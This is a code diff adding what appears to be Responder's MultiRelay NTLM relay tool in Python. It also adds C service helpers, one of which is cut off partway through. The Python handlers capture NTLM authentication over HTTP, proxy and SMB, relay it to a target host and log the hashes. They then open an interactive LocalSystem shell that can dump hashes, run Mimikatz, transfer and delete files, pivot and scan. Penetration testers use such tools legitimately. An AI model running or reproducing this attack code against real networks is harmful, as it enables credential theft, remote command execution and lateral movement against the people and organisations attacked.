+        except:
+            raise
+
+        s = ConnectToTarget()
+        try:
+            data = self.request.recv(8092)
+            ##First we check if it's a Webdav OPTION request.
+            Webdav = ServeOPTIONS(data)
+            if Webdav:
+                #If it is, send the option answer, we'll send him to auth when we receive a profind.
+                self.request.send(Webdav)
+                data = self.request.recv(4096)
+
+            NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+            ##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
+            if NTLM_Auth:
+                #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
+                Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+
+            if Packet_NTLM == "\x01":
+                ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
+                h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
+                n = SMBNegoCairo(Data = SMBNegoCairoData())
+                n.calculate()
+                packet0 = str(h)+str(n)
+                buffer0 = longueur(packet0)+packet0
+                s.send(buffer0)
+                smbdata = s.recv(2048)
+                ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
+                if smbdata[8:10] == "\x72\x00":
+                    head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
+                    t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
+                    t.calculate()
+                    packet1 = str(head)+str(t)
+                    buffer1 = longueur(packet1)+packet1
+                    s.send(NetworkSendBufferPython2or3(buffer1))
+                    smbdata = s.recv(2048) #got it here.
+
+                ## Send HTTP Proxy
+                Buffer_Ans = WPAD_NTLM_Challenge_Ans()
+                Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
+                key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
+                self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
+                data = self.request.recv(8092)
+                NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+                Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
+
+                ##Got NTLM Message 3 from client.
+                if Packet_NTLM == "\x03":
+                    NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
+                    ##Might be anonymous, verify it and if so, send no go to client.
+                    if IsSMBAnonymous(NTLM_Auth):
+                        Response = WPAD_Auth_407_Ans()
+                        self.request.send(str(Response))
+                        data = self.request.recv(8092)
+                else:
+                    #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
+                    #and has not attempted before. While at it, let's grab his hash.
+                    Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
+                    if Username is not None:
+                        head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
+                        t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
+                        t.calculate()
+                        packet1 = str(head)+str(t)
+                        buffer1 = longueur(packet1)+packet1
+                        print("[+] SMB Session Auth sent.")
+                        s.send(NetworkSendBufferPython2or3(buffer1))
+                        smbdata = s.recv(2048)
+                        RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
+                        if RunCmd is None:
+                            s.close()
+                            self.request.close()
+                            return None
+
+            else:
+                ##Any other type of request, send a 407.
+                Response = WPAD_Auth_407_Ans()
+                self.request.send(str(Response))
+
+        except Exception:
+            self.request.close()
+            ##No need to print anything (timeouts, rst, etc) to the user console..
+            pass
+
+
+class HTTPRelay(BaseRequestHandler):
+
+    def handle(self):
+        try:
+            #Don't handle requests while a shell is open. That's the goal after all.
+            if IsShellOpen():
+                return None
+            if IsPivotOn():
+                return None
+        except:
+            raise
+
+        try:
+            s = ConnectToTarget()
+
+            data = self.request.recv(8092)
+            ##First we check if it's a Webdav OPTION request.
+            Webdav = ServeOPTIONS(data)
+            if Webdav:
+                #If it is, send the option answer, we'll send him to auth when we receive a profind.
+                self.request.send(NetworkSendBufferPython2or3(Webdav))
+                data = self.request.recv(4096)
+
+            NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+            ##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
+            if NTLM_Auth:
+                #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
+                Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+
+                if Packet_NTLM == "\x01":
+                    ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
+                    h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
+                    n = SMBNegoCairo(Data = SMBNegoCairoData())
+                    n.calculate()
+                    packet0 = str(h)+str(n)
+                    buffer0 = longueur(packet0)+packet0
+                    s.send(buffer0)
+                    smbdata = s.recv(2048)
+                    ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
+                    if smbdata[8:10] == "\x72\x00":
+                        head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
+                        t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
+                        t.calculate()
+                        packet1 = str(head)+str(t)
+                        buffer1 = longueur(packet1)+packet1
+                        s.send(NetworkSendBufferPython2or3(buffer1))
+                        smbdata = s.recv(2048) #got it here.
+
+                    ## Send HTTP Response.
+                    Buffer_Ans = IIS_NTLM_Challenge_Ans()
+                    Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
+                    key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
+                    self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
+                    data = self.request.recv(8092)
+                    NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+                    Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
+
+                    ##Got NTLM Message 3 from client.
+                    if Packet_NTLM == "\x03":
+                        NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
+                    ##Might be anonymous, verify it and if so, send no go to client.
+                    if IsSMBAnonymous(NTLM_Auth):
+                        Response = IIS_Auth_401_Ans()
+                        self.request.send(str(Response))
+                        data = self.request.recv(8092)
+                    else:
+                        #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
+                        #and has not attempted before. While at it, let's grab his hash.
+                        Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
+
+                        if Username is not None:
+                            head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00")
+                            t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
+                            t.calculate()
+                            packet1 = str(head)+str(t)
+                            buffer1 = longueur(packet1)+packet1
+                            print("[+] SMB Session Auth sent.")
+                            s.send(NetworkSendBufferPython2or3(buffer1))
+                            smbdata = s.recv(2048)
+                            RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
+                            if RunCmd is None:
+                                s.close()
+                                self.request.close()
+                                return None
+
+            else:
+                ##Any other type of request, send a 401.
+                Response = IIS_Auth_401_Ans()
+                self.request.send(str(Response))
+
+
+        except Exception:
+            self.request.close()
+            ##No need to print anything (timeouts, rst, etc) to the user console..
+            pass
+
+class SMBRelay(BaseRequestHandler):
+
+    def handle(self):
+        try:
+            #Don't handle requests while a shell is open. That's the goal after all.
+            if IsShellOpen():
+                return None
+        except:
+            raise
+
+        try:
+            s = ConnectToTarget()
+
+            data = self.request.recv(8092)
+
+            ##Negotiate proto answer. That's us.
+            if data[8:10] == b'\x72\x00':
+                Header = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x43\xc8", pid=pidcalc(data),mid=midcalc(data))
+                Body = SMBRelayNegoAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
+                packet1 = str(Header)+str(Body)
+                Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
+                self.request.send(NetworkSendBufferPython2or3(Buffer))
+                data = self.request.recv(4096)
+
+            ## Make sure it's not a Kerberos auth.
+            if data.find(b'NTLM') != -1:
+                ## Start with nego protocol + session setup negotiate to our target.
+                data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s, Pivoting)
+
+                ## Make sure it's not a Kerberos auth.
+            if data.find(b'NTLM') != -1:
+            ##Relay all that to our client.
+                if data[8:10] == b'\x73\x00':
+                    head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
+                    #NTLMv2 MIC calculation is a concat of all 3 NTLM (nego,challenge,auth) messages exchange.
+                    #Then simply grab the whole session setup packet except the smb header from the client and pass it to the server.
+                    t = smbdata[36:].decode('latin-1')
+                    packet0 = str(head)+str(t)
+                    buffer0 = longueur(packet0)+packet0
+                    self.request.send(NetworkSendBufferPython2or3(buffer0))
+                    data = self.request.recv(4096)
+            else:
+                #if it's kerberos, ditch the connection.
+                s.close()
+                return None
+
+            if IsSMBAnonymous(NetworkSendBufferPython2or3(data)):
+                ##Send logon failure for anonymous logins.
+                head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
+                t = SMBSessEmpty()
+                packet1 = str(head)+str(t)
+                buffer1 = longueur(packet1)+packet1
+                self.request.send(NetworkSendBufferPython2or3(buffer1))
+                s.close()
+                return None
+
+            else:
+                #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
+                #and has not attempted before. While at it, let's grab his hash.
+                Username, Domain = ParseSMBHash(data,self.client_address[0],challenge,UserToRelay,Host[0],Pivoting)
+                if Username is not None:
+                    ##Got the ntlm message 3, send it over to SMB.
+                    head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34].decode('latin-1'),mid="\x03\x00")
+                    t = data[36:].decode('latin-1')#Final relay.
+                    packet1 = str(head)+str(t)
+                    buffer1 = longueur(packet1)+packet1
+                    if Pivoting[0] == "1":
+                        pass
+                    else:
+                        print("[+] SMB Session Auth sent.")
+                    s.send(NetworkSendBufferPython2or3(buffer1))
+                    smbdata = s.recv(4096)
+                    #We're all set, dropping into shell.
+                    RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
+                    #If runcmd is None it's because tree connect was denied for this user.
+                    #This will only happen once with that specific user account.
+                    #Let's kill that connection so we can force him to reauth with another account.
+                    if RunCmd is None:
+                        s.close()
+                        return None
+
+                else:
+                    ##Send logon failure, so our client might authenticate with another account.
+                    head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
+                    t = SMBSessEmpty()
+                    packet1 = str(head)+str(t)
+                    buffer1 = longueur(packet1)+packet1
+                    self.request.send(NetworkSendBufferPython2or3(buffer1))
+                    data = self.request.recv(4096)
+                    self.request.close()
+                    return None
+
+        except Exception:
+            self.request.close()
+            ##No need to print anything (timeouts, rst, etc) to the user console..
+            pass
+
+
+#Interface starts here.
+def RunShellCmd(data, s, clientIP, Target, Username, Domain):
+
+    #Let's declare our globals here..
+    #Pivoting gets used when the pivot cmd is used, it let us figure out in which mode is MultiRelay. Initial Relay or Pivot mode.
+    global Pivoting
+    #Update Host, when pivoting is used.
+    global Host
+    #Make sure we don't open 2 shell at the same time..
+    global ShellOpen
+    ShellOpen = ["Shell is open"]
+
+    # On this block we do some verifications before dropping the user into the shell.
+    if data[8:10] == b'\x73\x6d':
+        print("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.")
+        print("[+] Hashes were saved anyways in Responder/logs/ folder.\n")
+        Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
+        del ShellOpen[:]
+        return False
+
+    if data[8:10] == b'\x73\x8d':
+        print("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n")
+        Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
+        del ShellOpen[:]
+        return False
+
+    if data[8:10] == b'\x73\x5e':
+        print("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n")
+        del ShellOpen[:]
+        return False
+
+    ## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$:
+    ## Tree Connect
+    if data[8:10] == b'\x73\x00':
+        GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session.
+        head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x43\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
+        t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$")
+        t.calculate()
+        packet1 = str(head)+str(t)
+        buffer1 = longueur(packet1)+packet1
+        s.send(NetworkSendBufferPython2or3(buffer1))
+        data = s.recv(2048)
+
+    ## Nope he doesn't.
+    if data[8:10] == b'\x75\x22':
+        if Pivoting[0] == "1":
+            pass
+        else:
+            print("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n")
+            Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
+        del ShellOpen[:]
+        return False
+
+    # This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
+    if data[8:10] == b'\x75\xcc':
+        print("[+] Tree Connect AndX denied. Bad Network Name returned.")
+        del ShellOpen[:]
+        return False
+
+    ## Tree Connect on C$ is successfull.
+    if data[8:10] == b'\x75\x00':
+        if Pivoting[0] == "1":
+            pass
+        else:
+            print("[+] Looks good, "+Username+" has admin rights on C$.")
+        head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
+        t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
+        t.calculate()
+        packet1 = str(head)+str(t)
+        buffer1 = longueur(packet1)+packet1
+        s.send(NetworkSendBufferPython2or3(buffer1))
+        data = s.recv(2048)
+
+    ## Run one command.
+    if data[8:10] == b'\x75\x00' and OneCommand != None or Dump:
+        print("[+] Authenticated.")
+        if OneCommand != None:
+            print("[+] Running command: %s"%(OneCommand))
+            RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
+        if Dump:
+            print("[+] Dumping hashes")
+            DumpHashes(data, s, Target[0])
+        os._exit(1)
+
+    ## Drop into the shell.
+    if data[8:10] == b'\x75\x00' and OneCommand == None:
+        if Pivoting[0] == "1":
+            pass
+        else:
+            print("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n")
+            ShowHelp()
+        Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
+        print(color('Connected to %s as LocalSystem.'%(Target[0]),2,1))
+
+    while True:
+
+        ## We either just arrived here or we're back from a command operation, let's setup some stuff.
+        if data[8:10] == b'\x75\x00':
+        #start a thread for raw_input, so we can do other stuff while we wait for a command.
+            t = Thread(target=get_command, args=())
+            t.daemon = True
+            t.start()
+
+            #Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation
+            #to maintain MultiRelay alive and well.
+            count = 0
+            DoEvery = random.randint(10, 45)
+            while any(x in Cmd for x in Cmd) is False:
+                count = count+1
+                SMBKeepAlive(s, data)
+                if count == DoEvery:
+                    DumbSMBChain(data, s, Target[0])
+                    count = 0
+                if any(x in Cmd for x in Cmd) is True:
+                    break
+
+            ##Grab the commands. Cmd is global in get_command().
+            DumpReg = re.findall('^dump', Cmd[0])
+            Read    = re.findall('^read (.*)$', Cmd[0])
+            RegDump = re.findall('^regdump (.*)$', Cmd[0])
+            Get     = re.findall('^get (.*)$', Cmd[0])
+            Upload  = re.findall('^upload (.*)$', Cmd[0])
+            Delete  = re.findall('^delete (.*)$', Cmd[0])
+            RunAs   = re.findall('^runas (.*)$', Cmd[0])
+            LCmd    = re.findall('^lcmd (.*)$', Cmd[0])
+            Mimi    = re.findall('^mimi (.*)$', Cmd[0])
+            Mimi32  = re.findall('^mimi32 (.*)$', Cmd[0])
+            Scan    = re.findall('^scan (.*)$', Cmd[0])
+            Pivot   = re.findall('^pivot (.*)$', Cmd[0])
+            Help    = re.findall('^help', Cmd[0])
+
+            if Cmd[0] == "exit":
+                print("[+] Returning in relay mode.")
+                del Cmd[:]
+                del ShellOpen[:]
+                return None
+
+            ##For all of the following commands we send the data (var: data) returned by the
+            ##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore.
+            ##We also clean up the command array when done.
+            if DumpReg:
+                data = DumpHashes(data, s, Target[0])
+                del Cmd[:]
+
+            if Read:
+                File = Read[0]
+                data = ReadFile(data, s, File, Target[0])
+                del Cmd[:]
+
+            if Get:
+                File = Get[0]
+                data = GetAfFile(data, s, File, Target[0])
+                del Cmd[:]
+
+            if Upload:
+                File = Upload[0]
+                if os.path.isfile(File):
+                    FileSize, FileContent = UploadContent(File)
+                    File = os.path.basename(File)
+                    data = WriteFile(data, s, File,  FileSize, FileContent, Target[0])
+                    del Cmd[:]
+                else:
+                    print(File+" does not exist, please specify a valid file.")
+                    del Cmd[:]
+
+            if Delete:
+                Filename = Delete[0]
+                data = DeleteFile(data, s, Filename, Target[0])
+                del Cmd[:]
+
+            if RegDump:
+                Key = RegDump[0]
+                data = SaveAKey(data, s, Target[0], Key)
+                del Cmd[:]
+
+            if RunAs:
+                if os.path.isfile(RunAsFileName):
+                    FileSize, FileContent = UploadContent(RunAsFileName)
+                    FileName = os.path.basename(RunAsFileName)
+                    data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                    Exec = RunAs[0]
+                    data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
+                    del Cmd[:]
+                else:
+                    print(RunAsFileName+" does not exist, please specify a valid file.")
+                    del Cmd[:]
+
+            if LCmd:
+                subprocess.call(LCmd[0], shell=True)
+                del Cmd[:]
+
+            if Mimi:
+                if os.path.isfile(MimikatzFilename):
+                    FileSize, FileContent = UploadContent(MimikatzFilename)
+                    FileName = os.path.basename(MimikatzFilename)
+                    data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                    Exec = Mimi[0]
+                    data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
+                    del Cmd[:]
+                else:
+                    print(MimikatzFilename+" does not exist, please specify a valid file.")
+                    del Cmd[:]
+
+            if Mimi32:
+                if os.path.isfile(Mimikatzx86Filename):
+                    FileSize, FileContent = UploadContent(Mimikatzx86Filename)
+                    FileName = os.path.basename(Mimikatzx86Filename)
+                    data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                    Exec = Mimi32[0]
+                    data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
+                    del Cmd[:]
+                else:
+                    print(Mimikatzx86Filename+" does not exist, please specify a valid file.")
+                    del Cmd[:]
+
+            if Pivot:
+                if Pivot[0] == Target[0]:
+                    print("[Pivot Verification Failed]: You're already on this host. No need to pivot.")
+                    del Pivot[:]
+                    del Cmd[:]
+                else:
+                    if ShowSigning(Pivot[0]):
+                        del Pivot[:]
+                        del Cmd[:]
+                    else:
+                        if os.path.isfile(RunAsFileName):
+                            FileSize, FileContent = UploadContent(RunAsFileName)
+                            FileName = os.path.basename(RunAsFileName)
+                            data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                            RunAsPath = '%windir%\\Temp\\'+FileName
+                            Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
+
+                            if Status == True:
+                                print("[+] Pivoting to %s."%(Pivot[0]))
+                                if os.path.isfile(RunAsFileName):
+                                    FileSize, FileContent = UploadContent(RunAsFileName)
+                                    data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                                    #shell will close.
+                                    del ShellOpen[:]
+                                    #update the new host.
+                                    Host = [Pivot[0]]
+                                    #we're in pivoting mode.
+                                    Pivoting = ["1"]
+                                    data = PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Target[0], RunAsPath, FileName)
+                                    del Cmd[:]
+                                    s.close()
+                                    return None
+
+                            if Status == False:
+                                print("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.")
+                                del Cmd[:]
+                                del Pivot[:]
+                        else:
+                            print(RunAsFileName+" does not exist, please specify a valid file.")
+                            del Cmd[:]
+
+            if Scan:
+                LocalIp = FindLocalIp()
+                Range = ConvertToClassC(Target[0], Scan[0])
+                RunPivotScan(Range, Target[0])
+                del Cmd[:]
+
+            if Help:
+                ShowHelp()
+                del Cmd[:]
+
+            ##Let go with the command.
+            if any(x in Cmd for x in Cmd):
+                if len(Cmd[0]) > 1:
+                    if os.path.isfile(SysSVCFileName):
+                        FileSize, FileContent = UploadContent(SysSVCFileName)
+                        FileName = os.path.basename(SysSVCFileName)
+                        RunPath = '%windir%\\Temp\\'+FileName
+                        data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
+                        data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
+                        del Cmd[:]
+                    else:
+                        print(SysSVCFileName+" does not exist, please specify a valid file.")
+                        del Cmd[:]
+        if isinstance(data, str):
+           data = data.encode('latin-1')
+        if data is None:
+            print("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n")
+
+        if data[8:10] == b"\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
+            head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
+            t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")#
+            t.calculate()
+            packet1 = str(head)+str(t)
+            buffer1 = longueur(packet1)+packet1
+            s.send(NetworkSendBufferPython2or3(buffer1))
+            data = s.recv(2048)
+
+class ThreadingTCPServer(TCPServer):
+    def server_bind(self):
+        TCPServer.server_bind(self)
+
+ThreadingTCPServer.allow_reuse_address = 1
+ThreadingTCPServer.daemon_threads = True
+
+def serve_thread_tcp(host, port, handler):
+    try:
+        server = ThreadingTCPServer((host, port), handler)
+        server.serve_forever()
+    except:
+        print(color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1))
+
+def main():
+    try:
+        threads = []
+        threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMBRelay,)))
+        threads.append(Thread(target=serve_thread_tcp, args=('', 3128, HTTPProxyRelay,)))
+        threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTPRelay,)))
+        if ExtraPort != 0:
+            threads.append(Thread(target=serve_thread_tcp, args=('', int(ExtraPort), HTTPProxyRelay,)))
+        for thread in threads:
+            thread.setDaemon(True)
+            thread.start()
+
+        while True:
+            time.sleep(1)
+
+    except (KeyboardInterrupt, SystemExit):
+        ##If we reached here after a MultiRelay shell interaction, we need to reset the terminal to its default.
+        ##This is a bug in python readline when dealing with raw_input()..
+        if ShellOpen:
+            os.system('stty sane')
+        ##Then exit
+        sys.exit("\rExiting...")
+
+if __name__ == '__main__':
+    main()
--- a/tools/MultiRelay/RelayMultiCore.py
+++ b/tools/MultiRelay/RelayMultiCore.py
--- a/tools/MultiRelay/RelayMultiPackets.py
+++ b/tools/MultiRelay/RelayMultiPackets.py
--- a/tools/MultiRelay/init.py
+++ b/tools/MultiRelay/init.py
--- a/tools/MultiRelay/bin/Runas.c
+++ b/tools/MultiRelay/bin/Runas.c
@@ -0,0 +1,100 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include <windows.h>
+#include <userenv.h>
+#include <wtsapi32.h>
+
+int wmain(int argc, wchar_t * argv[]);
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv);
+void WINAPI ServiceCtrlHandler(DWORD Opcode);
+
+SERVICE_STATUS m_ServiceStatus = {SERVICE_WIN32_OWN_PROCESS, SERVICE_STOPPED, 0, NO_ERROR, 0, 0, 0};
+SERVICE_STATUS_HANDLE m_ServiceStatusHandle = NULL;
+HANDLE m_pyrsvcRunning;
+PWCHAR z_cmdLine, z_logFile;
+const WCHAR PYRSVC_NAME[] = L"pyrsvc", PYRSVC_PRE_CMD[] = L"cmd.exe /c \"", PYRSVC_POST_CMD[] = L"\" > ", PYRSVC_END_CMD[] = L" 2>&1";
+
+int wmain(int argc, wchar_t * argv[])
+{
+	int status = ERROR_SERVICE_NOT_IN_EXE;
+	const SERVICE_TABLE_ENTRY DispatchTable[]= {{(LPWSTR) PYRSVC_NAME, ServiceMain}, {NULL, NULL}};
+	if(argc == 3)
+	{
+		if(z_cmdLine = _wcsdup(argv[1]))
+		{
+			if(z_logFile = _wcsdup(argv[2]))
+			{
+				if(m_pyrsvcRunning = CreateEvent(NULL, TRUE, FALSE, NULL))
+				{
+					if(StartServiceCtrlDispatcher(DispatchTable))
+						status = ERROR_SUCCESS;
+					else status = GetLastError();
+					CloseHandle(m_pyrsvcRunning);
+				}
+				free(z_logFile);
+			}
+			free(z_cmdLine);
+		}
+	}
+	return status;
+}
+
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv)
+{
+	STARTUPINFO si = {0};
+	PROCESS_INFORMATION pi;
+	PWCHAR arguments;
+	DWORD size;
+	HANDLE hUser;
+	LPVOID env;
+	si.cb = sizeof(STARTUPINFO);
+	if(m_ServiceStatusHandle = RegisterServiceCtrlHandler(PYRSVC_NAME, ServiceCtrlHandler))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+		m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
+		m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+
+		size = ((ARRAYSIZE(PYRSVC_PRE_CMD) - 1) + lstrlen(z_cmdLine) + (ARRAYSIZE(PYRSVC_POST_CMD) - 1) + lstrlen(z_logFile) + (ARRAYSIZE(PYRSVC_END_CMD) - 1) + 1) * sizeof(WCHAR);
+		if(arguments = (PWCHAR) malloc(size))
+		{
+			memset(arguments, '\0', size);
+			wcscat_s(arguments, size, PYRSVC_PRE_CMD);
+			wcscat_s(arguments, size, z_cmdLine);
+			wcscat_s(arguments, size, PYRSVC_POST_CMD);
+			wcscat_s(arguments, size, z_logFile);
+			wcscat_s(arguments, size, PYRSVC_END_CMD);
+			if(WTSQueryUserToken(WTSGetActiveConsoleSessionId(), &hUser))
+			{
+				if(CreateEnvironmentBlock(&env, hUser, FALSE))
+				{
+					if(CreateProcessAsUser(hUser, NULL, arguments, NULL, NULL, FALSE, CREATE_NO_WINDOW | CREATE_UNICODE_ENVIRONMENT, NULL, NULL, &si, &pi))
+					{
+						CloseHandle(pi.hThread);
+						CloseHandle(pi.hProcess);
+					}
+					DestroyEnvironmentBlock(env);
+				}
+				CloseHandle(hUser);
+			}
+			free(arguments);
+		}
+		WaitForSingleObject(m_pyrsvcRunning, INFINITE);
+		m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
+		SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
+	}
+}
+
+void WINAPI ServiceCtrlHandler(DWORD Opcode)
+{
+	if((Opcode == SERVICE_CONTROL_STOP) || (Opcode == SERVICE_CONTROL_SHUTDOWN))
+	{
+		m_ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+		SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus);
+		SetEvent(m_pyrsvcRunning);
+	}
+}
--- a/tools/MultiRelay/bin/Syssvc.c
+++ b/tools/MultiRelay/bin/Syssvc.c
@@ -0,0 +1,90 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include <windows.h>
+
+int wmain(int argc, wchar_t * argv[]);
+void WINAPI ServiceMain(DWORD argc, LPWSTR *argv);
+void WINAPI ServiceCtrlHandler(DWORD Opcode);
+
+SERVICE_STATUS m_ServiceStatus = {SERVICE_WIN32_OWN_PROCESS, SERVICE_STOPPED, 0, NO_ERROR, 0, 0, 0};
+SERVICE_STATUS_HANDLE m_ServiceStatusHandle = NULL;
+HANDLE m_pyrsvcRunning;
+PWCHAR z_cmdLine, z_logFile;
+const WCHAR PYRSVC_NAME[] = L"pyrsvc", PYRSVC_PRE_CMD[] = L"cmd.exe /c \"", PYRSVC_POST_CMD[] = L"\" > ", PYRSVC_END_CMD[] = L" 2>&1";
+
+int wmain(int argc, wchar_t * argv[])
+{
+	int status = ERROR_SERVICE_NOT_IN_EXE;
+	const SERVICE_TABLE_ENTRY DispatchTable[]= {{(LPWSTR) PYRSVC_NAME, ServiceMain}, {NULL, NULL}};
+	if(argc == 3)
+	{
+		if(z_cmdLine = _wcsdup(argv[1]))
+		{
+			if(z_logFile = _wcsdup(argv[2]))
+			{
+				if(m_pyrsvcRunning = CreateEvent(NULL, TRUE, FALSE, NULL))
+				{
